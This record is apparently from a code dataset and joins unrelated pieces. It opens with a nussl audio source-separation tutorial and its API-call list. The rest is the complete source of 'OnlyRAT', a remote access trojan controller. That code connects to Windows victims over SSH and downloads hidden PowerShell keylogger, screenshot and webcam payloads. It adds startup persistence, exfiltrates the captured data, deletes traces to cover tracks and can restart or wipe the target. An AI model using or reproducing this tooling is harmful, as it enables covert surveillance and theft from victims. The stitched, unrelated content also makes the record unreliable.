# in general. For now, let's consider that we *know* the actual assignment of each
# time-frequency bin. If we know that, how do we separate the sounds?
#
# First let's look at one of the sources, say the drums:
plt.figure(figsize=(10, 3))
plt.title('Drums')
nussl.utils.visualize_spectrogram(sources['drums'], y_axis='mel')
plt.tight_layout()
plt.show()
# Looking at this versus the mixture spectrogram, one can see which time-frequency
# bins belong to the drum. Now, let's build a *mask* on the mixture spectrogram
# using a soft mask. We construct the soft mask using the drum STFT data and the
# mixture STFT data, like so:
mask_data = np.abs(sources['drums'].stft()) / np.abs(mix.stft())
# Hmm, this may not be a safe way to do this. What if there's a `0` in both the source
# and the mix? Then we would get `0/0`, which would result in NaN in the mask. Or
# what if the source STFT is louder than the mix at some time-frequency bin due to
# cancellation between sources when mixed? Let's do things a bit more safely by
# using the maximum and some checking...
mask_data = (
np.abs(sources['drums'].stft()) /
np.maximum(
np.abs(mix.stft()),
np.abs(sources['drums'].stft())
) + nussl.constants.EPSILON
)
# Great, some peace of mind. Now let's apply the soft mask to the mixture to
# separate the drums. We can do this by element-wise multiplying the STFT and
# adding the mixture phase.
# +
magnitude, phase = np.abs(mix.stft_data), np.angle(mix.stft_data)
masked_abs = magnitude * mask_data
masked_stft = masked_abs * np.exp(1j * phase)
drum_est = mix.make_copy_with_stft_data(masked_stft)
drum_est.istft()
drum_est.embed_audio()
plt.figure(figsize=(10, 3))
plt.title('Separated drums')
nussl.utils.visualize_spectrogram(drum_est, y_axis='mel')
plt.tight_layout()
plt.show()
# -
# Cool! Sounds pretty good! But it'd be a drag if we had to type all of
# that every time we wanted to separate something. Lucky for you, we
# built this stuff into the core functionality of *nussl*!
#
# `SoftMask` and `BinaryMask`
# ---------------------------
#
# At the core of *nussl*'s separation functionality are the classes
# `SoftMask` and `BinaryMask`. These are classes that contain some logic
# for masking and can be used with AudioSignal objects. We have a soft mask
# already, so let's build a `SoftMask` object.
soft_mask = nussl.core.masks.SoftMask(mask_data)
# `soft_mask` contains our mask here:
soft_mask.mask.shape
# We can apply the soft mask to our mix and return the separated drums easily,
# using the `apply_mask` method:
# +
drum_est = mix.apply_mask(soft_mask)
drum_est.istft()
drum_est.embed_audio()
plt.figure(figsize=(10, 3))
plt.title('Separated drums')
nussl.utils.visualize_spectrogram(drum_est, y_axis='mel')
plt.tight_layout()
plt.show()
# -
# Sometimes masks are *binary* instead of *soft*. To apply a binary mask, we can do this:
# +
binary_mask = nussl.core.masks.BinaryMask(mask_data > .5)
drum_est = mix.apply_mask(binary_mask)
drum_est.istft()
drum_est.embed_audio()
plt.figure(figsize=(10, 3))
plt.title('Separated drums')
nussl.utils.visualize_spectrogram(drum_est, y_axis='mel')
plt.tight_layout()
plt.show()
# -
# Playing around with the threshold will result in more or less leakage of other sources:
# +
binary_mask = nussl.core.masks.BinaryMask(mask_data > .05)
drum_est = mix.apply_mask(binary_mask)
drum_est.istft()
drum_est.embed_audio()
plt.figure(figsize=(10, 3))
plt.title('Separated drums')
nussl.utils.visualize_spectrogram(drum_est, y_axis='mel')
plt.tight_layout()
plt.show()
# -
# You can hear the vocals slightly in the background as well as the
# other sources.
#
# Finally, given a list of separated sources, we can use some handy nussl
# functionality to easily visualize the masks and listen to the original
# sources that make up the mixture.
# +
plt.figure(figsize=(10, 7))
plt.subplot(211)
nussl.utils.visualize_sources_as_masks(
sources, db_cutoff=-60, y_axis='mel')
plt.subplot(212)
nussl.utils.visualize_sources_as_waveform(
sources, show_legend=False)
plt.tight_layout()
plt.show()
nussl.play_utils.multitrack(sources, ext='.wav')
# -
end_time = time.time()
time_taken = end_time - start_time
print(f'Time taken: {time_taken:.4f} seconds')
| [
"numpy.abs",
"nussl.core.masks.BinaryMask",
"nussl.play_utils.multitrack",
"nussl.utils.visualize_spectrogram",
"nussl.utils.visualize_sources_as_waveform",
"nussl.utils.visualize_sources_as_masks",
"matplotlib.pyplot.subplot",
"numpy.angle",
"matplotlib.pyplot.figure",
"numpy.exp",
"nussl.core.... | [((671, 682), 'time.time', 'time.time', ([], {}), '()\n', (680, 682), False, 'import time\n'), ((692, 729), 'nussl.datasets.MUSDB18', 'nussl.datasets.MUSDB18', ([], {'download': '(True)'}), '(download=True)\n', (714, 729), False, 'import nussl\n'), ((1045, 1072), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (1055, 1072), True, 'import matplotlib.pyplot as plt\n'), ((1073, 1105), 'matplotlib.pyplot.title', 'plt.title', (['"""Mixture spectrogram"""'], {}), "('Mixture spectrogram')\n", (1082, 1105), True, 'import matplotlib.pyplot as plt\n'), ((1106, 1158), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (['mix'], {'y_axis': '"""mel"""'}), "(mix, y_axis='mel')\n", (1139, 1158), False, 'import nussl\n'), ((1159, 1177), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1175, 1177), True, 'import matplotlib.pyplot as plt\n'), ((1178, 1188), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1186, 1188), True, 'import matplotlib.pyplot as plt\n'), ((1732, 1759), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (1742, 1759), True, 'import matplotlib.pyplot as plt\n'), ((1760, 1778), 'matplotlib.pyplot.title', 'plt.title', (['"""Drums"""'], {}), "('Drums')\n", (1769, 1778), True, 'import matplotlib.pyplot as plt\n'), ((1779, 1844), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (["sources['drums']"], {'y_axis': '"""mel"""'}), "(sources['drums'], y_axis='mel')\n", (1812, 1844), False, 'import nussl\n'), ((1845, 1863), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1861, 1863), True, 'import matplotlib.pyplot as plt\n'), ((1864, 1874), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1872, 1874), True, 'import matplotlib.pyplot as plt\n'), ((3202, 3229), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', 
(3212, 3229), True, 'import matplotlib.pyplot as plt\n'), ((3230, 3258), 'matplotlib.pyplot.title', 'plt.title', (['"""Separated drums"""'], {}), "('Separated drums')\n", (3239, 3258), True, 'import matplotlib.pyplot as plt\n'), ((3259, 3316), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (['drum_est'], {'y_axis': '"""mel"""'}), "(drum_est, y_axis='mel')\n", (3292, 3316), False, 'import nussl\n'), ((3317, 3335), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3333, 3335), True, 'import matplotlib.pyplot as plt\n'), ((3336, 3346), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3344, 3346), True, 'import matplotlib.pyplot as plt\n'), ((3898, 3934), 'nussl.core.masks.SoftMask', 'nussl.core.masks.SoftMask', (['mask_data'], {}), '(mask_data)\n', (3923, 3934), False, 'import nussl\n'), ((4193, 4220), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (4203, 4220), True, 'import matplotlib.pyplot as plt\n'), ((4221, 4249), 'matplotlib.pyplot.title', 'plt.title', (['"""Separated drums"""'], {}), "('Separated drums')\n", (4230, 4249), True, 'import matplotlib.pyplot as plt\n'), ((4250, 4307), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (['drum_est'], {'y_axis': '"""mel"""'}), "(drum_est, y_axis='mel')\n", (4283, 4307), False, 'import nussl\n'), ((4308, 4326), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4324, 4326), True, 'import matplotlib.pyplot as plt\n'), ((4327, 4337), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4335, 4337), True, 'import matplotlib.pyplot as plt\n'), ((4452, 4496), 'nussl.core.masks.BinaryMask', 'nussl.core.masks.BinaryMask', (['(mask_data > 0.5)'], {}), '(mask_data > 0.5)\n', (4479, 4496), False, 'import nussl\n'), ((4576, 4603), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (4586, 4603), True, 'import matplotlib.pyplot as 
plt\n'), ((4604, 4632), 'matplotlib.pyplot.title', 'plt.title', (['"""Separated drums"""'], {}), "('Separated drums')\n", (4613, 4632), True, 'import matplotlib.pyplot as plt\n'), ((4633, 4690), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (['drum_est'], {'y_axis': '"""mel"""'}), "(drum_est, y_axis='mel')\n", (4666, 4690), False, 'import nussl\n'), ((4691, 4709), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4707, 4709), True, 'import matplotlib.pyplot as plt\n'), ((4710, 4720), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4718, 4720), True, 'import matplotlib.pyplot as plt\n'), ((4835, 4880), 'nussl.core.masks.BinaryMask', 'nussl.core.masks.BinaryMask', (['(mask_data > 0.05)'], {}), '(mask_data > 0.05)\n', (4862, 4880), False, 'import nussl\n'), ((4960, 4987), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 3)'}), '(figsize=(10, 3))\n', (4970, 4987), True, 'import matplotlib.pyplot as plt\n'), ((4988, 5016), 'matplotlib.pyplot.title', 'plt.title', (['"""Separated drums"""'], {}), "('Separated drums')\n", (4997, 5016), True, 'import matplotlib.pyplot as plt\n'), ((5017, 5074), 'nussl.utils.visualize_spectrogram', 'nussl.utils.visualize_spectrogram', (['drum_est'], {'y_axis': '"""mel"""'}), "(drum_est, y_axis='mel')\n", (5050, 5074), False, 'import nussl\n'), ((5075, 5093), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5091, 5093), True, 'import matplotlib.pyplot as plt\n'), ((5094, 5104), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5102, 5104), True, 'import matplotlib.pyplot as plt\n'), ((5389, 5416), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 7)'}), '(figsize=(10, 7))\n', (5399, 5416), True, 'import matplotlib.pyplot as plt\n'), ((5417, 5433), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (5428, 5433), True, 'import matplotlib.pyplot as plt\n'), ((5434, 5510), 
'nussl.utils.visualize_sources_as_masks', 'nussl.utils.visualize_sources_as_masks', (['sources'], {'db_cutoff': '(-60)', 'y_axis': '"""mel"""'}), "(sources, db_cutoff=-60, y_axis='mel')\n", (5472, 5510), False, 'import nussl\n'), ((5516, 5532), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {}), '(212)\n', (5527, 5532), True, 'import matplotlib.pyplot as plt\n'), ((5533, 5602), 'nussl.utils.visualize_sources_as_waveform', 'nussl.utils.visualize_sources_as_waveform', (['sources'], {'show_legend': '(False)'}), '(sources, show_legend=False)\n', (5574, 5602), False, 'import nussl\n'), ((5608, 5626), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5624, 5626), True, 'import matplotlib.pyplot as plt\n'), ((5627, 5637), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5635, 5637), True, 'import matplotlib.pyplot as plt\n'), ((5639, 5687), 'nussl.play_utils.multitrack', 'nussl.play_utils.multitrack', (['sources'], {'ext': '""".wav"""'}), "(sources, ext='.wav')\n", (5666, 5687), False, 'import nussl\n'), ((5704, 5715), 'time.time', 'time.time', ([], {}), '()\n', (5713, 5715), False, 'import time\n'), ((2979, 3000), 'numpy.abs', 'np.abs', (['mix.stft_data'], {}), '(mix.stft_data)\n', (2985, 3000), True, 'import numpy as np\n'), ((3002, 3025), 'numpy.angle', 'np.angle', (['mix.stft_data'], {}), '(mix.stft_data)\n', (3010, 3025), True, 'import numpy as np\n'), ((3088, 3108), 'numpy.exp', 'np.exp', (['(1.0j * phase)'], {}), '(1.0j * phase)\n', (3094, 3108), True, 'import numpy as np\n')] |
#!/usr/bin/python
# python console for OnlyRAT
# created by : C0SM0
# imports
import os
import sys
import getpass
import random as r
from datetime import datetime
# banner for display
banner = """
_;,
,,=-,--,,__ _,-;:;;},,,_
_,oo, Ll _,##&&&&$$&&$$$&-=;%%^%&;v:&& @ `=,_
,oO" `0} Ll ,%#####&#>&&$$$$&$$$&,&'$$#`"%%;,,,*%^<}
_,--O;_, 0_ Ll ,%%%%%&%-#&###$$"$$$$$*;&&$,#;%^*%$$^{,%;'
,cC'oO`'CC ,OnnNNNNn, Ll YY, ,%#&%%$$$$%%%%%##&&^$%^%&&&$$'&#,-%%--"'
,CCCO" `C ,0`Nn` `Nn Ll YY, ,;;##&,$$$$$$$;,%%%&&%%%&&&&&&$$%%'
{CC{ ,0' NN NN Ll Yy yY';#&,#,$$$$$%%%%%%%%&%%%&&&&&&%%`
CCC( _o0 NN NN Ll YyyY ,;&##&###%%$$%&&%%%%#^%^&&&&&%{`
,OCC{ ,0C NN NN Ll YY ;#&&#####&%;%&&,%%%%#%=%%%&^%%
,O`'"Cc_.o0cC NN NN Ll y, YY ;&&&^##&&&$%&&&%%%"` `%%%%
o0 _o0"` '` NN NN Ll Yy,yYY '^%%&VGh%%%%%&&"^%_,, "%%%,_ _,.,_
0o,_,oo0" NN NN Ll `YyY` ``'"lIG9ubHkg,,""''` ""%%>_,;VyIG5lZ;,
"00O"` ``'``""UkFUIHlvdSdsbCBldm;" `"WQ=,
"""
# _..----.._ _
# .' .--. "-.(0)_
# '-.__.-'"'=:| , _)_ \\__ . c\\'-..
# '''------'---''---'-"
# :::::::: :::: ::: ::: ::: ::: ::::::::: ::: :::::::::::
# :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
# +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
# +#+ +:+ +#+ +:+ +#+ +#+ +#++: +#++:++#: +#++:++#++: +#+
# +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ +#+
# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
# ######## ### #### ########## ### ### ### ### ### ###
# [::] The Only RAT You'll Ever Need [::]
# [::] Created By : Blue Cosmo [::]
# help menu
help_menu = """
[+] Arguments:
<username>.rat = configuration file
[+] Example:
onlyrat bluecosmo.rat
"""
# option menu
options_menu = """
[+] Command and Control:
[orconsole] ------ Remote Console
[fix orconsole] -- Fix Remote Console
[upload] --------- Upload File
[downlaod] ------- Download File
[restart] -------- Restart Target PC
[shutdown] ------- Shutdown Target PC
[killswitch] ----- Removes OnlyRAT From Target
[+] Reconnaissance:
[install keylogger] ------ Install Keylogger
[install screencapture] -- Install ScreenCapture
[install webcam] --------- Install WebCam Capture
[grab keylogs] ----------- Grab Keylogs
[grab screenshots] ------- Grab ScreenShots From ScreenCapture
[grab webcam] ------------ Grab WebCam Photos
[+] Options:
[help] ------- Help Menu
[man] -------- Onlyrat Manual
[config] ----- Display RAT File
[version] ---- Version Number
[update] ----- Update OnlyRAT
[uninstall] -- Uninstall OnlyRAT
[quit] ------- Quit
* any other commands will be
sent through your terminal
[*] Select an [option]...
"""
# operator identity and console prompt
username = getpass.getuser()  # local (attacker-side) account name
header = f"[~] {username}@onlyrat $ "  # prompt string shown before every input()
# base URL (no scheme) of the repository hosting OnlyRAT payloads
remote_path = "raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main"
# local installation directory; root's home directory has no /home prefix
local_path = f"/home/{username}/.OnlyRAT" if username != "root" else "/root/.OnlyRAT"
# random text generator for obfuscation
def random_text(length=10):
    """Return a random alphabetic identifier.

    Args:
        length: number of characters to generate. Defaults to 10, which
            matches the original fixed-size behavior.

    Returns:
        A string of ``length`` random ASCII letters (mixed case).
    """
    # local import keeps the module's top-level import block unchanged
    import string
    return "".join(r.choice(string.ascii_letters) for _ in range(length))
# read config file
def read_config(config_file):
    """Parse a ``.rat`` configuration file into a dictionary.

    The file layout is four lines: target IP address, SSH password,
    working directory and startup directory. The two directory lines use
    Windows backslashes, which are normalized to forward slashes.

    Args:
        config_file: path to the configuration file.

    Returns:
        dict with keys IPADDRESS, PASSWORD, WORKINGDIRECTORY and
        STARTUPDIRECTORY (all stripped of surrounding whitespace).
    """
    # context manager closes the handle (the original leaked an open file)
    with open(config_file, "r") as handle:
        read_lines = handle.readlines()
    configuration = {
        "IPADDRESS": read_lines[0].strip(),
        "PASSWORD": read_lines[1].strip(),
        "WORKINGDIRECTORY": read_lines[2].replace("\\", "/").strip(),
        "STARTUPDIRECTORY": read_lines[3].replace("\\", "/").strip(),
    }
    return configuration
# display configuration file data
def print_config(configuration):
    """Print every setting of the loaded configuration, one per line."""
    lines = [f"{setting} : {value}" for setting, value in configuration.items()]
    for line in lines:
        print(line)
# clear screen
def clear():
    """Clear the operator's terminal via the shell ``clear`` command."""
    os.system("clear")
# terminates program
def exit():
    """Print a farewell message and terminate the process.

    NOTE(review): this shadows the ``exit`` builtin; callers throughout
    this file rely on the name, so it is kept as-is.
    """
    print("\n[*] Exiting...")
    sys.exit()
# gets current date and time
def current_date():
    """Return the current local time formatted as MM-DD-YYYY_HH-MM-SS."""
    return datetime.now().strftime("%m-%d-%Y_%H-%M-%S")
# connects rat to target
def connect(address, password):
    """Open an interactive SSH session to the target as user ``onlyrat``.

    NOTE(review): the password is interpolated directly into a shell
    command; a password containing quotes or shell metacharacters will
    break (or abuse) the command line.
    """
    print("\n [*] Connecting to target...")
    # remotely connect
    os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address}")
# remote uploads with SCP
def remote_upload(address, password, upload, path):
    """Copy a local file to ``path`` on the target via scp + sshpass."""
    print("\n[*] Starting Upload...")
    # scp upload
    os.system(f"sshpass -p \"{password}\" scp {upload} onlyrat@{address}:{path}")
    print("[+] Upload complete\n")
# remote download with SCP
def remote_download(address, password, path):
    """Recursively copy ``path`` from the target into local ~/Downloads."""
    print("\n[*] Starting Download...")
    # ensure the destination directory exists, then scp download
    os.system("mkdir ~/Downloads")
    os.system(f"sshpass -p \"{password}\" scp -r onlyrat@{address}:{path} ~/Downloads")
    print("[+] Download saved to \"~/Downloads\"\n")
# run commands remotely with SCP
def remote_command(address, password, command):
    """Run a single shell ``command`` on the target over SSH.

    NOTE(review): ``command`` is wrapped in single quotes only; commands
    containing single quotes will break the invocation.
    """
    # remote command execution
    os.system(f"sshpass -p \"{password}\" ssh onlyrat@{address} '{command}'")
# keylogger
def keylogger(address, password, username, working):
    """Download the keylogger payload onto the target and register it for startup.

    The keylogger script is fetched into the target's working directory and
    a startup .cmd stub is written that relaunches it (hidden) on reboot.
    """
    print("\n[*] Prepping keylogger...")
    # web requests
    keylogger_command = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/keylogger.ps1 -OutFile {working}/KHRgMHYmdT.ps1\""
    controller_command = f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/KHRgMHYmdT.ps1 >> GiLqXiexKP.cmd"
    print("[+] Keylogger prepped")
    # installing keylogger
    print("[*] Installing keylogger...")
    remote_command(address, password, keylogger_command)
    print("[*] Installing controller...")
    remote_command(address, password, controller_command)
    print("[+] Keylogger installed sucessfully\n")
    # the payload only starts on the next boot
    print("\n[!] Restart target computer to execute")
# takes screenshots off of target
def grab_screenshots(address, password, working, username):
    """Pull captured screenshots off the target, then wipe them remotely."""
    # download the screenshot directory from the target
    print("\n[*] Downloading screenshots...")
    screenshot_location = f"{working}/amETlOMhPo"
    remote_download(address, password, screenshot_location)
    print("[+] Screenshots downloaded")
    # move the loot into a timestamped local folder
    print("[*] Fromatting screenshots...")
    loot_folder = f"screenshots-{username}-{current_date()}"
    os.system(f"mkdir ~/Downloads/{loot_folder}")
    os.system(f"mv ~/Downloads/amETlOMhPo/* ~/Downloads/{loot_folder}")
    os.system(f"rm -rf ~/Downloads/amETlOMhPo")
    print("[+] Screenshots formatted")
    # delete the screenshots off of the target
    print("[*] Covering tracks...")
    delete_screenshots = f"powershell Remove-Item {working}/amETlOMhPo/*"
    remote_command(address, password, delete_screenshots)
    print("[+] Screenshots downloaded")
    # confirmation
    print("\n[+] Screenshots downloaded to \"~/Downloads\"\n")
# takes webcam pictures off of target
def grab_webcam(address, password, working, username):
    """Pull captured webcam photos off the target, then wipe them remotely."""
    # download the webcam photo directory from the target
    print("\n[*] Downloading webcam photos...")
    screenshot_location = f"{working}/bNOEXCxyVp"
    remote_download(address, password, screenshot_location)
    print("[+] Photos downloaded")
    # move the loot into a timestamped local folder
    print("[*] Fromatting photos...")
    loot_folder = f"webcam-{username}-{current_date()}"
    os.system(f"mkdir ~/Downloads/{loot_folder}")
    os.system(f"mv ~/Downloads/bNOEXCxyVp/* ~/Downloads/{loot_folder}")
    os.system(f"rm -rf ~/Downloads/bNOEXCxyVp")
    print("[+] Photos formatted")
    # delete the photos off of the target (only the .bmp captures)
    print("[*] Covering tracks...")
    delete_screenshots = f"powershell Remove-Item {working}/bNOEXCxyVp/*.bmp"
    remote_command(address, password, delete_screenshots)
    print("[+] Photos downloaded")
    # confirmation
    print("\n[+] Photos downloaded to \"~/Downloads\"\n")
# killswitch
def killswitch(address, password, working, username):
    """Remove every OnlyRAT artifact from the target and reboot it.

    Deletes the working directory, the OpenSSH server capability, the
    ``onlyrat`` account and its home, and the startup stub, then issues
    a restart.
    """
    print("\n[*] Prepping killswitch...")
    # single PowerShell one-liner that tears everything down
    killswitch_command = f"powershell /c cd C:; Remove-Item {working}/* -r -Force; Remove-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; Remove-Item \"C:/Users/onlyrat\" -r -Force; Remove-LocalUser -Name \"onlyrat\"; shutdown /r"
    print("[+] Killswitch prepped")
    # remove the startup stub first, then run the teardown
    print("[*] Executing killswitch...")
    remote_command(address, password, f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && del GiLqXiexKP.cmd")
    remote_command(address, password, killswitch_command)
    print("[+] Killswitch Executed sucessfully\n")
    # the teardown command ends with shutdown /r
    print("\n[*] Restarting target computer...")
# custom upload
def upload(address, password, working):
    """Prompt the operator for a local file and upload it to the target."""
    # get upload file
    print("\n[~] Enter file you wish to upload :")
    upload_file = input(header)
    # upload file into the target's working directory
    print("\n[*] Uploading...")
    remote_upload(address, password, upload_file, working)
    print(f"[+] Uploaded sucessfully to \"{working}\"\n")
# custom download
def download(address, password):
    """Prompt the operator for a remote path and download it from the target."""
    # get download path
    print("\n[~] Enter path of file you wish to download :")
    download_file = input(header)
    # download file into local ~/Downloads
    print("\n[*] Downloading...")
    remote_download(address, password, download_file)
# update OnlyRAT
def update():
    """Check GitHub for a newer OnlyRAT release and optionally install it.

    Downloads the published version number, compares it with the local
    one, and either runs the update script (on operator confirmation)
    or returns to the main console.
    """
    print("\n[*] Checking for updates...")
    # fetch the latest published version number next to the local one
    os.system(f"curl https://raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/version.txt | tee ~/.OnlyRAT/latest.txt")
    # read both version numbers with context managers (the original
    # leaked two open file handles here)
    with open(f"{local_path}/version.txt", "r") as version_file:
        current_version = float(version_file.read())
    with open(f"{local_path}/latest.txt", "r") as latest_file:
        latest_version = float(latest_file.read())
    # remove the temporary version number file
    os.system("rm -rf ~/.OnlyRAT/latest.txt")
    # if a new version is available, offer to update
    if latest_version > current_version:
        print("\n[+] Update found")
        print("[~] Update Onlyrat? [y/n]\n")
        # user input, option
        option = input(f"{header}")
        if option == "y":
            os.system(f"sh ~/.OnlyRAT/payloads/update.sh")
        else:
            # anything other than "y" returns to the console
            main()
    # otherwise, report and return to the console
    else:
        print("\n[+] OnlyRAT already up to date")
        print("[*] Hit any key to continue...\n")
        input(header)
        main()
# uninstalls onlyrat
def remove():
    """Delete the local OnlyRAT installation after operator confirmation.

    NOTE(review): any answer other than "y" or "n" falls through and
    simply returns to the caller.
    """
    # confirmation
    print("\n[~] Are you sure you want to remove OnlyRAT [y/n]\n")
    # user input
    option = input(header)
    # delete OnlyRAT
    if option == "y":
        os.system("rm -rf ~/.OnlyRAT")
    # cancel
    if option == "n":
        main()
# listener
def listener():
    """Placeholder for a future listener mode (not implemented yet)."""
    pass
# command line interface
def cli(arguments):
    """Interactive command loop of the OnlyRAT console.

    Args:
        arguments: truthy when a ``<username>.rat`` configuration file
            was supplied on the command line; otherwise the help menu is
            printed and the function returns.

    Unrecognized options are passed straight to the local shell.
    """
    # display banner
    clear()
    # listener
    # if sys.argv[1] == "listener":
    #     listener()
    print(banner)
    # if arguments exist
    if arguments:
        print("\t[~] Type \"help\" for help menu :\n")
        # loop user input
        while True:
            # user input, option
            option = input(header)
            # check if configuration file exists
            try:
                configuration = read_config(sys.argv[1])
            except FileNotFoundError:
                print("\n[!!] File does not exist")
                exit()
            # get config info
            ipv4 = configuration.get("IPADDRESS")
            password = configuration.get("PASSWORD")
            working_direcory = configuration.get("WORKINGDIRECTORY")
            startup_direcory = configuration.get("STARTUPDIRECTORY")
            # slice "C:/Users/<name>/AppData/Local/Temp" down to <name>
            target_username = working_direcory[9:-19]
            # remote console
            if option == "orconsole":
                connect(ipv4, password)
            # fix remote console (BUGFIX: this was a second `if`, which made
            # "orconsole" fall through to the final `else` and run
            # os.system("orconsole") locally)
            elif option == "fix orconsole":
                os.system(f"sh {local_path}/payloads/fix-orconsole.sh {local_path} {ipv4} {password}")
            # keylogger option
            elif option == "install keylogger":
                keylogger(ipv4, password, target_username, working_direcory)
            # grab keylogs option
            elif option == "grab keylogs":
                remote_download(ipv4, password, f"{working_direcory}/{target_username}.log")
                remote_command(ipv4, password, f"powershell New-Item -Path {working_direcory}/{target_username}.log -ItemType File -Force")
                print("[+] Log file saved to \"~/Downloads\"")
                print("[+] Log file on target has been wiped\n")
            # installs screen capture option
            elif option == "install screencapture":
                print("\n[*] Installing screen capture...")
                install_screencaputre = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/screenshot.ps1 -OutFile {working_direcory}/SbQRViPjIq.ps1\""
                add_to_startup = f"cd C:/Users/{target_username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/SbQRViPjIq.ps1 >> GiLqXiexKP.cmd"
                remote_command(ipv4, password, install_screencaputre)
                remote_command(ipv4, password, add_to_startup)
                print("[+] ScreenCapture installed\n")
                print("\n[!] Restart target computer to execute\n")
            # grab screenshots option
            elif option == "grab screenshots":
                grab_screenshots(ipv4, password, working_direcory, target_username)
            # custom upload
            elif option == "upload":
                upload(ipv4, password, working_direcory)
            # custom download
            elif option == "download" or option == "exfiltrate":
                download(ipv4, password)
            # restart target option
            elif option == "restart":
                remote_command(ipv4, password, "shutdown /r")
            # shutdown target option
            elif option == "shutdown":
                remote_command(ipv4, password, "shutdown")
            # install webcam option
            elif option == "install webcam":
                print("\n[*] Installing webcam capture...")
                install_webcam = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/webcam.ps1 -OutFile {working_direcory}/bNOEXCxyVp/LIspiXrVAu.ps1\""
                add_to_startup = f"cd C:/Users/{target_username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell cd $env:temp/bNOEXCxyVp; Start-Process powershell.exe -windowstyle hidden $env:temp/bNOEXCxyVp/LIspiXrVAu.ps1 >> GiLqXiexKP.cmd"
                remote_command(ipv4, password, install_webcam)
                remote_command(ipv4, password, add_to_startup)
                print("[+] Webcam capture installed\n")
                print("\n[!] Restart target computer to execute\n")
            # grab webcam photos
            elif option == "grab webcam":
                grab_webcam(ipv4, password, working_direcory, target_username)
            # help menu
            elif option == "help":
                print(banner)
                print(options_menu)
            # display config file info
            elif option == "config":
                print_config(configuration)
                print(f"USERNAME : {target_username}")
            # get version number
            elif option == "version":
                os.system(f"cat {local_path}/version.txt")
            # update option
            elif option == "update":
                update()
                exit()
            # kill switch (BUGFIX: prompt was missing its closing bracket)
            elif option == "killswitch":
                print("\n[~] Are you sure you want to remove OnlyRAT from your target [y/n]")
                confirm = input(header)
                if confirm == "y":
                    killswitch(ipv4, password, working_direcory, target_username)
                else:
                    main()
            # onlyrat manual
            elif option == "man" or option == "manual":
                os.system(f"xdg-open https://github.com/CosmodiumCS/OnlyRAT/blob/main/payloads/manual.md")
            # remove installation
            elif option == "remove" or option == "uninstall":
                remove()
            # quit option
            elif option == "quit" or option == "exit":
                exit()
            # any other command runs in the local shell
            else:
                os.system(option)
            # new line for cleaner UI
            print("\n")
    # if arguments don't exist
    else:
        print(help_menu)
# main code
def main():
    """Entry point: reset the screen, then launch the interactive CLI."""
    clear()
    # a configuration-file argument on the command line enables the console
    has_arguments = len(sys.argv) > 1
    cli(has_arguments)
# runs main code
if __name__ == "__main__":
# runs main function
main() | [
"getpass.getuser",
"os.system",
"datetime.datetime.now",
"sys.exit"
